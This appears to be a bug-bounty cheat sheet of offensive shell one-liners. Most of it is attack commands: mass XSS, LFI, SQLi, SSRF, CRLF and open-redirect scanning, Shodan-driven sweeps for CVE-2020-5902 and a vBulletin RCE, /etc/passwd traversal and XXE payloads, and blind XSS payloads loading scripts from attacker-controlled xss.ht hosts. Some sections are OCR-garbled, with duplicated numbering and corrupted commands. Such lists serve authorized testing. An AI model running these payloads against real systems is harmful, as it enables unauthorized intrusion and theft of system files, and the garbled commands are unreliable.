
1. Find subdomains

subfinder -d issuu.com -silent | httpx -silent -o issuu.com1.txt
iterable.com

2.Find XSS - Single Target - { One-liner }

gospider -s "https://www.target.com/" -c 19 -d 5 --blacklist ".
(jpgljpeglgif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-
source | grep -e "code-200" | awk '{print $5}'| grep "=" | gsreplace -a |
dalfox pipe -o result.txt


3. Find XSS - Multiple Targets - { One-liner }

gospider -S urls.txt -c 10 -d 5-blacklist ". (jpg|jpeg|gif|css|tif tiff|png|ttf|woff|woff2|ico pdf|svg|txt)" --other source | grep -e "code-288" | awk '{print $5)| grep "=" | qsreplace a dalfox pipe -o result.txt

4. Local File Inclusion

gau HOST | gf lfi | qsreplace " /etc/passwd "  | xargs -I% -P 25 sh -c ' curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %" '


5.Local File Inclusion
@dwisiswant0

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

6.Open-redirect
@dwisiswant0

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
@N3T_hunt3r

cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

7.XSS
@cihanmehmet

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
@fanimalikhack

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
@oliverrickfors

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

8.Prototype Pollution
@R0X4R

subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

9.CVE-2020-5902
@Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

10.CVE-2020-3452
@vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt

11.CVE-2022-0378
@7h3h4ckv157

cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done

12. vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
@Madrobot_

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

13.Find JavaScript Files
@D0cK3rG33k

assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done

14.Extract Endpoints from JavaScript
@renniepak

cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

15.Get CIDR & Org Information from Target Lists
@steve_mcilwain

for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done

16.Get Subdomains from RapidDNS.io
@andirrahmani1

curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

17.Get Subdomains from BufferOver.run
@_ayoubfathi_

curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
@AnubhavSingh_

export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"

18.Get Subdomains from Riddler.io
@pikpikcu

curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

19.Get Subdomains from VirusTotal
@pikpikcu

curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

20.Get Subdomain with cyberxplore
@pikpikcu

curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 

21.Get Subdomains from CertSpotter
@caryhooper

curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

22.Get Subdomains from Archive
@pikpikcu

curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

23.Get Subdomains from JLDC
@pikpikcu

curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

24.Get Subdomains from securitytrails
@pikpikcu

curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u

25.Bruteforcing Subdomain using DNS Over
@pikpikcu

while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt

26.Get Subdomains With sonar.omnisint.io
@pikpikcu

curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

27.Get Subdomains With synapsint.com
@pikpikcu

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

28.Get Subdomains from crt.sh
@vict0ni

curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

29.Sort & Tested Domains from Recon.dev
@stokfedrik

curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent

30.Subdomain Bruteforcer with FFUF
@GochaOqradze

ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

31.Find Allocated IP Ranges for ASN from IP Address
wains.be

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

32.Extract IPs from a File
@emenalf

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

33.Ports Scan without CloudFlare
@dwisiswant0

subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

34.Create Custom Wordlists
@tomnomnom

gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt
cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt  

35.Extracts Juicy Informations
@Prial Islam Khan

for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt  ;done

36.Find Subdomains TakeOver
@hahwul

subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 

37.Dump Custom URLs from ParamSpider
@hahwul

cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %;

38.URLs Probing with cURL + Parallel
@akita_zen

cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

39.Dump In-scope Assets from chaos-bugbounty-list
@dwisiswant0

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

40.Dump In-scope Assets from bounty-targets-data
@dwisiswant0

41.HackerOne Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

42.BugCrowd Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

43.Intigriti Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

44.YesWeHack Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

45.HackenProof Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

46.Federacy Programs
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

47.Dump URLs from sitemap.xml
@healthyoutlet

curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

48.Pure Bash Linkfinder
@ntrzz

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt

49.Extract Endpoints from swagger.json
@zer0pwn

curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'

50.CORS Misconfiguration
@manas_hunter

site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done

51.Find Hidden Servers and/or Admin Panels
@rez0__

ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt 

52.Recon Using api.recon.dev
@z0idsec

curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain

53.Find Live Host/Domain/Assets
@YashGoti

subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

54.XSS without gf
@HacktifyS

waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done

55.Get Subdomains from IPs
@laughface809

python3 hosthunter.py HOSTS.txt > OUT.txt

56.Gather Domains from Content-Security-Policy
@geeknik

curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u

57.Nmap IP:PORT Parser Piped to HTTPX
@dwisiswant0

nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent


58.Check .git/HEAD - { One-liner }

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-
data/master/data/domains.txt -nv | cat domains.txt | sed
's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -
timeout 3 -retries @ -ports 80,8080,443 -threads 500 -title | anew

59.find .git/HEAD - { One-liner }

curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.
[1.name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx —
55 B =Yoo oo 1o R =Y o b =Y Vol of IR =X o VKT of T [ 123 T2 A o 1 =TTV i IR o0 of o K-E-M - IR oTo T ot £
80,8080,443 -threads 500 -title | anew


51.Find XSS - { One-liner }

#/bin/bash
hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" 3
| egrep -iv ".
(ipglipeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" |
gsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-1*" |

dalfox pipe -b https://your.xss.ht


52. BXSS - Blind XSS in Parameters - { One-liner }

subfinder -d target.com | gau | grep " " | bxss -appendMode -payload '">
<script src=https://hacker.xss.ht></script>"' -parameters


53. Blind XSS in X-Forwarded-For Header - { One-liner }

subfinder -d target.com | gau | bxss -payload '"><script
src=https://hacker.xss.ht></script>"' -header “X—For‘war‘ded—For“%

54.XSS using gf with single target - { One-liner }
vecho "http://testphp.vulnweb.com/" | waybackurls | httpx -silent —timeout§
2 -threads 100 | gf xss | anew


55.XSS httpx - { One-liner }

httpx -1 master.txt -silent -no-color -threads 300 -location 301,302 | awki
*{print $2}' | grep -Eo "(http|https)://[~/"]1.* | tr -d '[]1" | anew |
xargs -I@ sh -c 'gospider -d @ -s @' | tr ' ' '\n' | grep -Eo
*(http|https)://[~/"]1.*" | grep "=" | gsreplace "<svg onload=alert(1)>"


56. XSS from JavaScript hidden params - { One-liner }

assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do
vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e
s, var',""$url”2',g" -e s/ //g° | grep -v '.js' | sed ‘'s/.*/&=xss/g');
echo -e "\e[1;33m$url\n\e[1;32m$vars"


57.Extract all URLs from Source Code
 curl "https://example .com/" | grep -oP '(https*://|www\.)[^ ]*' 

58. Find Subdomain from VirusTotal

curl -s "https ://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

59.Get Subdomains from Archive

 curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

 60. Find JavaScript File

assetfinder --subs-only HOST | gau | egrep -v '(.css| .png| .jpeg| .jpg|  .svg|  .gif| .wolf)' | while read url ;do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_l+" | sed -e 's, 'var', '"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo e "\e[1;33m$url\n" "\e[1;32m$vars"; done


===========================================================================================================================================

61. CRLF Injection Check One Liner
On Live Domains
Explanation – Takes a file of live domains as input and passes it to rush, which runs 40 workers (-j40) in parallel and reports whether the injected value is reflected in a response header.

cat live-domains | rush -j40 'if curl -Iks -m 10 "{}/%0D%0Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} may be vulnerable to CRLF Injection. Check Manually";fi'

On Live Urls with Parameters
Explanation – Takes a file of URLs as input and passes it to qsreplace, which replaces each parameter value with the injected one, then passes the result to rush, which runs 40 workers (-j40) in parallel and reports whether the injected value is reflected in a response header.

cat urls.txt | qsreplace "%0d%0acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'
Test Case 2

cat urls.txt | qsreplace "%E5%98%8D%E5%98%8Acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'
Test Case 3

cat urls.txt | qsreplace -a "%0d%0acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'
On Headers (Files containing live domains)
Explanation – Alerts if any of the tested request headers is vulnerable to CRLF injection.

cat $1 | rush -j40 'if curl -Iks -m 10 "{}" -H "CF-Connecting_IP: %0d%0acrlf:crlf" -H "From: root@%0d%0acrlf:crlf" -H "Client-IP: %0d%0acrlf:crlf" -H "X-Client-IP: %0d%0acrlf:crlf" -H "X-Forwarded-For: %0d%0acrlf:crlf" -H "X-Wap-Profile: %0d%0acrlf:crlf" -H "Forwarded: %0d%0acrlf:crlf" -H "True-Client-IP: %0d%0acrlf:crlf" -H "Contact: root@%0d%0acrlf:crlf" -H "X-Originating-IP: %0d%0acrlf:crlf" -H "X-Real-IP: %0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "From: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Forwarded-For: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Wap-Profile: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Forwarded: %E5%98%8D%E5%98%8Acrlf:crlf" -H "True-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Contact: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Originating-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Real-IP: %E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %0D%0Acrlf:crlf" -H "From: root@%0D%0Acrlf:crlf" -H "Client-IP: %0D%0Acrlf:crlf" -H "X-Client-IP: %0D%0Acrlf:crlf" -H "X-Forwarded-For: %0D%0Acrlf:crlf" -H "X-Wap-Profile: %0D%0Acrlf:crlf" -H "Forwarded: %0D%0Acrlf:crlf" -H "True-Client-IP: %0D%0Acrlf:crlf" -H "Contact: root@%0D%0Acrlf:crlf" -H "X-Originating-IP: %0D%0Acrlf:crlf" -H "X-Real-IP: %0D%0Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} with vulnerable header may be vulnerable to CRLF Injection. Check Manually";fi'

62. SSRF Check One Liner
On Headers (File containing live domains)
Explanation – Injects the Burp Collaborator server into the request headers, issues a request, and saves each request with its timestamp to the output file, so that if a callback is received it can be matched to the request by its timing.

Replace $2 with your burp collaborator server.


cat live-domains | rush -j40 'if curl -skL -o /dev/null "{}" -H "CF-Connecting_IP: $2" -H "From: root@$2" -H "Client-IP: $2" -H "X-Client-IP: $2" -H "X-Forwarded-For: $2" -H "X-Wap-Profile: http://$2/wap.xml" -H "Forwarded: $2" -H "True-Client-IP: $2" -H "Contact: root@$2" -H "X-Originating-IP: $2" -H "X-Real-IP: $2"; then echo "{}" | ts; fi' | tee -a ssrf-headers-out.txt
On Urls containing params
Explanation – Takes a list of URLs, replaces each parameter value with the Burp Collaborator server, and passes the result to rush for parallel execution.

cat urls.txt | qsreplace "your.burpcollaborator.server" | rush -j40 'if curl -skL "{}" -o /dev/null; then echo "{}" | ts; fi' | tee -a ssrf-output-log.txt
Test Case 2

cat params.txt | qsreplace "http://$1" | rush -j40 'if curl -skL "{}" -o /dev/null; then echo "{}" | ts; fi' | tee -a ssrf-output-log.txt
63. SpringBoot Actuator Check One Liner
On Live Domains
Explanation – Takes a list of live domains and checks whether the Spring Boot actuator endpoints are publicly accessible.

cat live-domains | rush -j40 'if curl -skI -m 10 "{}/env" | grep -i "x-application-context" || curl -sk -m 10 "{}/actuator/env" | grep -q "sping.config.location\|spring.application.name\|JAVA_HOME" || curl -sk -m 10 "{}/env" | grep -q "sping.config.location\|spring.application.name\|JAVA_HOME" || curl -sk -m 10 "{}/actuator" | grep -q '{"_links":{"self"' || curl -sk -m 10 "{}/actuator/configprops" | grep -q "org.springframework.boot.actuate\|beans" || curl -sk -m 10 "{}/configprops" | grep -q "org.springframework.boot.actuate\|beans"; then echo "SpringBoot Actuator Found on {}"; fi' &
On Live urls with params
Explanation – Takes a list of URLs and checks whether the application is using Spring Boot.

cat params.txt | rush -j40 'if curl -skI -m 10 "{}" | grep -i "x-application-context"; then echo "SpringBoot application context header Found on {}"; fi'
64. Drop Blind XSS payload on list of Urls with params
Explanation – Takes a file of URLs as input, replaces each parameter value with the blind XSS payload, and issues the requests with 40 workers running in parallel.

cat urls.txt | qsreplace '"><script src="https://script.xss.ht"></script>' | rush -j40 'curl -sk "{}" -o /dev/null'
65. Reflection Check (XSS) on one domain by extracting Hidden params
Explanation – Extracts the hidden parameters from the page and checks whether each one is reflected, which may indicate XSS.


curl -skL "https://in.yahoo.com" | grep 'type="hidden"' | grep -Eo 'name="[^\"]+"' | cut -d'"' -f2 | xargs -I@ sh -c 'if curl -skL https://in.yahoo.com/?@=testxss | grep -q "value=testxss"; then echo "reflection found from @ parameter"; fi'
66. Find hidden parameters via Crawl on list of urls
Explanation – Takes a list of URLs, extracts the hidden parameters from each one, and saves the unique parameter names to a file.

cat alive.txt | rush 'curl -skL "{}" | grep "type\=\"hidden\"" | grep -Eo "name\=\"[^\"]+\"" | cut -d"\"" -f2 | sort -u' | anew params.txt
67. Find Secrets in Javascripts files via crawling
Explanation – Takes live domains as input, crawls them with hakrawler to extract JavaScript files, and then passes each file to the SecretFinder script, which checks it for sensitive data.

cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
68. Fetch Domains from Wayback Archive (Input Root-Domains)
Explanation – Takes the input of root-domains file and extracts the domains from the wayback archive.

Root-domains example – gq1.yahoo.com, abc.yahoo.com, root.yahoo.com etc

cat root-dom.txt | rush 'curl -s "http://web.archive.org/cdx/search/cdx?url=*.{}/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sed 's/\.com.*/.com/' | sort -u'
69. Directory Bruteforce using dirsearch and ffuf
Explanation – Directory brute force using ffuf. Takes live domains as input and scans for directories and files.

cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
using dirsearch
Explanation – Directory brute force using dirsearch. Takes live domains as input and scans for directories and files.

cat alive.txt | xargs -I@ sh -c 'python3 /root/Tools/dirsearch/dirsearch.py -w /path/to/wordlist.txt -u @ -e php,html,json,aspx -t 100' | tee -a dirsearch
70. Crawl list of Domains
Explanation – Crawls a list of domains in parallel with 30 workers.


cat alive.txt | xargs -P30 -I@ gospider -c 30 -t 15 -a -s @ -d 3 | anew spider

71. Subdomain bruteforce using ffuf
Explanation – Bruteforce subdomains using ffuf tool.

ffuf -u https://FUZZ.domain.com -w /path/to/wordlist -v | grep "| URL |" | awk '{print $4}'

72. Log4J Scan on list of domains
Explanation – Takes live domains as input and scans for log4j vulnerabilities.

cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u "@"
73. Hunt XSS
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
74. Hunt SQLi
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
75. Hunt SSRF
findomain -t http://target.com -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://YOUR.burpcollaborator.net
76. Hunt LFI
gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
77. Hunt Open Redirect
gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
78. Hunt Prototype Pollution
subfinder -d http://target.com | httpx -silent | sed 's/$/\/?__proto__[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
79. Hunt CORS
gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
80. Extract .js
echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder http://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew 
81. Extract URLs from comment
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
82. Dump In-scope Assets from HackerOne
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
83. Find live host/domain/assets
subfinder -d http://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
84. Screenshot
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' 
85. Blind SQL injection testing with time-based payloads
time curl -s 'https://target.com/search.php?q=1 AND sleep(5)--'
86. Directory traversal (path traversal) testing
curl 'https://target.com/page.php?page=../../../../etc/passwd'
87. WordPress version enumeration
curl -s 'https://target.com/readme.html' | grep 'Version'
88. Subdomain takeover testing using subjack
subjack -w subdomains.txt -a -t 100 -v -o takeover.txt -ssl
89. HTTP header injection testing
curl -H 'X-Forwarded-For: 127.0.0.1\r\nUser-Agent: Mozilla/5.0' 'https://target.com/'
90. File upload testing
curl -X POST -F 'file=@test.php' 'https://target.com/upload.php'
91. Cross-site request forgery (CSRF) testing
curl -X POST -d 'name=admin&password=123456&csrf_token=123456' 'https://target.com/login.php'
92. XXE (XML External Entity) injection testing
curl -d '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' 'https://target.com/xxe.php'
93. Get Content-Type
echo abc.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
94. Fuzz with FFUF
assetfinder http://att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'
95. Extract URL from .apk file
apktool -d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
96. Information Disclosure
cat host.txt | httpx -path //server-status?full=true -status-code -content-length
cat host.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length
97. Reflected XSS
subfinder -d abc.com | httprobe -c 100 > target.txt 
cat target.txt | waybackurls | gf xss | kxss
gospider -a -s abc.com -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
98. SSTI to RCE
 waybackurls http://target.com | qsreplace "abc{{9*9}}" > fuzz.txt
 ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
99. Dump In-scope Assets from chaos-bugbounty-list
curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
